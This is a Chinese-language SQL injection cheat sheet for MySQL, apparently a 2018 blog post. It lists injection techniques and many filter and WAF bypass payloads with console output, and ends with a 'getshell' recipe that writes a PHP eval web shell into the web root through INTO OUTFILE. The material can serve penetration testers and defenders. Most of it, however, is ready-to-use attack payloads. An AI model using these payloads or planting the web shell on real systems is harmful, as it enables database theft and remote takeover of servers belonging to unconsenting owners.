Sql-Cheat-Sheet

凡是不能把我毁灭的,都将使我更强

常见注入方式

1.Boolean-based blind

1
2
3
4
5
6
7
8
9
10
11
12
13
mysql> select*from`test`where`id`=1 and left(version(),1)=8;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select*from`test`where`id`=1 and ascii(substr((select table_name from information_schema.tables where table_schema=data base() limit 0,1),2,1))=101;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

2.Error-based

1
2
3
4
5
6
7
8
mysql> select * from test where id=1 union select version(),@@version_compile_os,floor(rand(0)*2)x from information_schema.character_sets group by x;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 8.0.12 | osx10.13 | 0 |
| 8.0.12 | osx10.13 | 1 |
+--------+----------+----------------------------------+

3.AND/OR time-based blind

1
2
3
4
5
6
7
8
9
10
11
12
13
mysql> select * from test where id=1 and sleep(2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
Time: 2.053s

mysql> select * from test where id=1 or sleep(2);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
Time: 6.226s

4.UNION query

1
2
3
4
5
6
7
8
9
mysql> select * from test where id=1 union select * from test;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+

常用函数

concat:将多个字符串连接成一个字符串
group_concat:返回一个字符串结果,该结果由分组中的值连接组合而成
concat_ws: concat with separator 指定参数之间的分隔符
system_user():系统用户名
user():用户名
current_user:当前用户名
session_user():连接数据库的用户名
database():数据库名
version():数据库版本
load_file():读取本地文件的函数
@@datadir:读取数据库路径(5.0 以上版本)
@@basedir:安装路径
@@version_complie_os:操作系统
@@HOSTNAME 主机名

判断是否具有读写权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
读取
mysql> select*from`test`where`id`=1 and (select count(*) from mysql.user)>0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

写入
mysql> select*from`test`where`id`=1 and (select count(file_priv) from mysql.user)>0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select*from`test`where`id`=1 and (select count(file_priv) from mysql.user)<0
+----+----------+----------+
| id | username | password |
+----+----------+----------+

注入绕过

1.字段列数不够

1
2
3
4
5
6
7
8
9
10
11
mysql> select * from test where id=1 union select null,floor(rand(0)*2)x from information_schema.tables group by x;
(1222, u'The used SELECT statements have a different number of columns'')

mysql> select * from test where id=1 union select null,null,floor(rand(0)*2)x from information_schema.tables group by x; -- 用null或者其他字符填充
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | <null> | 0 |
| <null> | <null> | 1 |
+--------+----------+----------------------------------+

2.过滤空格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
mysql> select(username)from(test)where(id)=1;
+----------+
| username |
+----------+
| admin |
+----------+

mysql> select * from test where id=1E0union select 1,2,3 --浮点数 1.0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 1 | 2 | 3 |
+----+----------+----------------------------------+

mysql> select*from/**/test/**/where/**/id=1;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select*from`test`where`id`=2;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
+----+----------+----------------------------------+

mysql> select*from`test`where`id`=1 union select@1=@1,2,3;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | 2 | 3 |
+--------+----------+----------------------------------+

mysql> select*from`test`where`id`=1 union select@1,2,3;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | 2 | 3 |
+--------+----------+----------------------------------+
备注: 一个 @ 表示用户定义,@@ 表示系统变量

在php中 \s 会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20

09:Horizontal Tab
0A:New Line
0B:Vertical Tab
0C:New Page
0D:Carriage Return
A0:MySQL 中 %a0 代表空白符,可以代替空格
20:Space
a0:空格
2B:+
2D:-
7E:~
21:!
40:@

SQLite3:0A 0D 0C 09 20
MySQL5 09:0A 0B 0C 0D A0 20
PosgresSQL:0A 0D 0C 09 20
Oracle 11g:00 0A 0D 0C 09 20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

3.过滤from x

1
2
3
4
5
6
7
8
9
mysql> select * from. test;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+

4.过滤逗号

使用 mid(user() from 1 for 1) 或 substr(user() from 1 for 1)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
mysql> select * from test where id=1 and (select ascii(substr(user() from 1 for 1)))=114;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select * from test where id=1 and (substr(user() from 1 for 1))='r';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select * from test limit 1 offset 2;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
+----+----------+----------------------------------+

mysql> select * from ((select 1)A join (select 2)B join ((select username from test where id=2))D); -- 相当于:UNION SELECT 1,2,3;
+---+---+----------+
| 1 | 2 | username |
+---+---+----------+
| 1 | 2 | root |
+---+---+----------+

5.过滤大于小于

greatest(x,y),返回x和y中较大的那个数 当然可以用非等于 !=

1
2
3
4
5
6
7
mysql> select greatest(ascii(mid(user(),1,1)),120)=120;
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),120)=120 |
+------------------------------------------+
| 1 |
+------------------------------------------+
以上是判断user()第一个字符的ascii码是否等于120. 若最终结果为120,返回true(1),否则返回false(0),可编写脚本枚举

6.运算比较之空格过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=110);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=114);
+----+----------+----------+
| id | username | password |
+----+----------+----------+

mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=114);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=115);
+----+----------+----------+
| id | username | password |
+----+----------+----------+


乘法和除法当然也可以

7.过滤and or xor not

and=&& or=|| xor=| not=! 注意在浏览器中输入部分字符需要url编码,例如&&为%26%26

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
mysql> select * from test where id=1 || (ascii(substr(database(),1,1))=116);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+

mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=116);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=115);
+----+----------+----------+
| id | username | password |
+----+----------+----------+

绕过:^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...

8.万能密码之or and优先级

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
mysql> select * from test where username='nouser' or '1'='1' or '1'='1' -- - and password='123';

+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+

mysql> select * from test where username='nouser' and password='123' or '1'='1';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+

9.过滤引号

1
2
3
4
5
6
7
8
9
10
11
12
13
mysql> select * from test where username=0x61646d696e;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select * from test where username=CHAR(97, 100, 109, 105, 110);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

10.过滤tables

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
mysql> select table_name from information_schema.partitions where table_schema=database();
+------------+
| TABLE_NAME |
+------------+
| test |
+------------+

mysql> select table_name from information_schema.statistics where table_schema=database();
+------------+
| TABLE_NAME |
+------------+
| test |
+------------+

mysql> select table_name from information_schema.table_constraints where table_schema=database();
+------------+
| table_name |
+------------+
| test |
+------------+

mysql> select table_name from information_schema.KEY_COLUMN_USAGE where table_schema=database();
+------------+
| table_name |
+------------+
| test |
+------------+

11.过滤select

(布尔|延时)盲注即可,也可以参考第6条

1
2
3
4
5
6
7
8
9
10
11
12
mysql> select*from`test`where`id`=1 and ascii(substr(database(),1,1))=116;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select*from`test`where`id`=1 and if(ascii(substr(database(),1,1))=116,sleep(5),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
Time: 5.081s

12.过滤union

盲注或者子查询猜解.最好还是编写脚本

1
2
3
4
5
6
mysql> select*from`test`where`id`=2 and (select username from test where id=1)='admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
+----+----------+----------------------------------+

13. 过滤=

使用like 、rlike 、regexp 或者 使用< 或者 >

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
mysql> select * from test where id=1 union select 1,2,table_name from information_schema.tables where table_name between 0x61 and 0x7a;
+----+----------+------------------------------------------------------+
| id | username | password |
+----+----------+------------------------------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 1 | 2 | CHARACTER_SETS |
| 1 | 2 | COLLATION_CHARACTER_SET_APPLICABILITY |
| 1 | 2 | COLLATIONS |
| 1 | 2 | COLUMN_PRIVILEGES |
...................between char(97) and char(122).......................
+----+----------+------------------------------------------------------+

mysql> select*from`test`where`id`=1 and 1 like 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+

mysql> select*from`test`where`id`=1 and 1 like 1;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

mysql> select 1,2,table_name from information_schema.tables where table_name between 'u' and 'v' limit 0,1;
+---+---+-----------------+
| 1 | 2 | TABLE_NAME |
+---+---+-----------------+
| 1 | 2 | USER_PRIVILEGES |
+---+---+-----------------+

mysql> select 1,2,table_name from information_schema.tables where table_name like 'u%' limit 1 offset 1;
+---+---+------------+
| 1 | 2 | TABLE_NAME |
+---+---+------------+
| 1 | 2 | users |
+---+---+------------+

mysql> select 1,2,table_name from information_schema.tables where table_name > 'u' and table_name < 'v' limit 10,1;
+---+---+--------------+
| 1 | 2 | TABLE_NAME |
+---+---+--------------+
| 1 | 2 | user_summary |
+---+---+--------------+

14.过滤updatexml及extractvalue

1
mysql> select*from`users`where`id`=1 AND polygon((select * from(select * from(select user())a)b));

ERROR 1367 (22007): Illegal non geometric ‘(select b.user() from (select ‘root@localhost’ AS user() from dual) b)’ value found during parsing

1
mysql> select*from`users`where`id`=1 AND GeometryCollection((select * from (select * from(select version())a)b));

ERROR 1367 (22007): Illegal non geometric ‘(select b.version() from (select ‘5.5.44-0ubuntu0.14.04.1’ AS version() from dual) b)’ value found during parsing

1
mysql> select*from`users`where`id`=1 AND multipoint((select * from(select * from(select @@basedir)a)b));

ERROR 1367 (22007): Illegal non geometric ‘(select b.@@basedir from (select ‘/usr’ AS @@basedir from dual) b)’ value found during parsing

1
mysql> select*from`users`where`id`=1 AND multilinestring((select * from(select * from(select database())a)b));

ERROR 1367 (22007): Illegal non geometric ‘(select b.database() from (select ‘test’ AS database() from dual) b)’ value found during parsing

1
mysql> select*from`users`where`id`=1 AND LINESTRING((select * from(select * from(select @@version_compile_os)a)b));

ERROR 1367 (22007): Illegal non geometric ‘(select b.@@version_compile_os from (select ‘debian-linux-gnu’ AS @@version_compile_os from dual) b)’ value found during parsing

1
mysql> select*from`users`where`id`=1 AND multipolygon((select * from(select * from(select @@datadir)a)b));

ERROR 1367 (22007): Illegal non geometric ‘(select b.@@datadir from (select ‘/var/lib/mysql/‘ AS @@datadir from dual) b)’ value found during parsing

1
mysql> select*from`users`where`id`=1 and exp(~(select * from (select user() ) a) );

ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’

1
mysql> select*from`users`where`id`=1  union select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

ERROR 1060 (42S21): Duplicate column name ‘5.5.44-0ubuntu0.14.04.1’

1
mysql> select*from`users`where`id`=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘5.5.44-0ubuntu0.14.04.11’ for key ‘group_key’

15.组合过滤之 preg_match('/(and|or|union|where)/i',$id)

上面基本介绍过了.大家都懂

1
2
3
4
5
1 || updatexml(1,concat(0x7e,database(),0x7e),1) -- 超过长度可以配合substr
1 %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))
1 || (select user from users limit 1) = 'admin'
1 %26%26 if(ascii(substr(database(),1,1))=115,sleep(5),1)
1 || ascii(substr(database(),1,1))=115

16.组合过滤之 preg_match('/(and|or|union|where|limit)/i', $id)

1
2
3
4
5
6
7
8
9
10
11
mysql> select*from`test` where id=2 || (select username from test group by id having id = 1) = 'admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+

报错注入或者盲注,最主要就是解决limit的问题.用having代替即可

17.组合过滤之 preg_match('/(and|or|union|where|limit|group by)/i', $id)

1
2
3
4
5
6
7
8
9
mysql> select*from`test` where id=2 || (select substr(group_concat(username),1,5) from test) = 'admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+

18.组合过滤之 preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

1
2
3
4
5
6
mysql> select*from`test` where id=-2 || substr(username,1,5) = 0x61646d696e;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

更新分割线

19.过滤 column

知道表名的前提下join报错爆字段

1
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b) c);

ERROR 1060 (42S21): Duplicate column name ‘id’

1
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b using(id)) c);

ERROR 1060 (42S21): Duplicate column name ‘username’

1
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b using(id,username)) c);

ERROR 1060 (42S21): Duplicate column name ‘password’

20.order by 注入

基于报错

1
mysql> select*from`users`order by`id`=rand(updatexml(1,concat(0x7e,database(),0x7e),1));

ERROR 1105 (HY000): XPATH syntax error: ‘~test~’

1
mysql> select*from`users`order by`id`=1 and updatexml(1,concat(0x7e,database(),0x7e),1);

ERROR 1105 (HY000): XPATH syntax error: ‘~test~’

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
基于返回信息不同
mysql> select*from`users`order by`id`=1 and ascii(substr((select database()),1,1))>1;
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
+----+----------+----------------------------------+-----------+

mysql> select*from`users`order by`id`=1 and ascii(substr((select database()),1,1))<1;
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
+----+----------+----------------------------------+-----------+

基于时间
mysql> select*from`users`order by`id`=1 and if(1=1,sleep(2),1);
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
+----+----------+----------------------------------+-----------+
4 rows in set (2.01 sec)

tips

'=' <--> 'like' <--> 'in' --> 'regexp' <--> 'rlike' --> '>' <--> '<'

1.爆所有表列

(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)

2.利用报错发现库表列

1
mysql> select*from`users`where`username`='admin' and polygon(username);

(1367, u”Illegal non geometric ‘test.users.username‘ value found during parsing”)

3.getshell

1
2
3
4
5
6
7
8
9
10
show variables like '%plugin%';
show variables like "secure_file_priv";
show variables like '%general_log%';

use mysql;
Drop TABLE IF EXISTS shell;
Create TABLE shell (shell text NOT NULL);
Insert INTO shell (shell) VALUES('<?php @eval($_POST[1]);?>');
select shell from shell into outfile '/var/www/html/1.php';
Drop TABLE IF EXISTS shell;

如果存在堆叠注入直接 id=1';set global general_log = on;

本文为原创,转载请遵守本站的版本

更新于: 2018年10月16日 10:10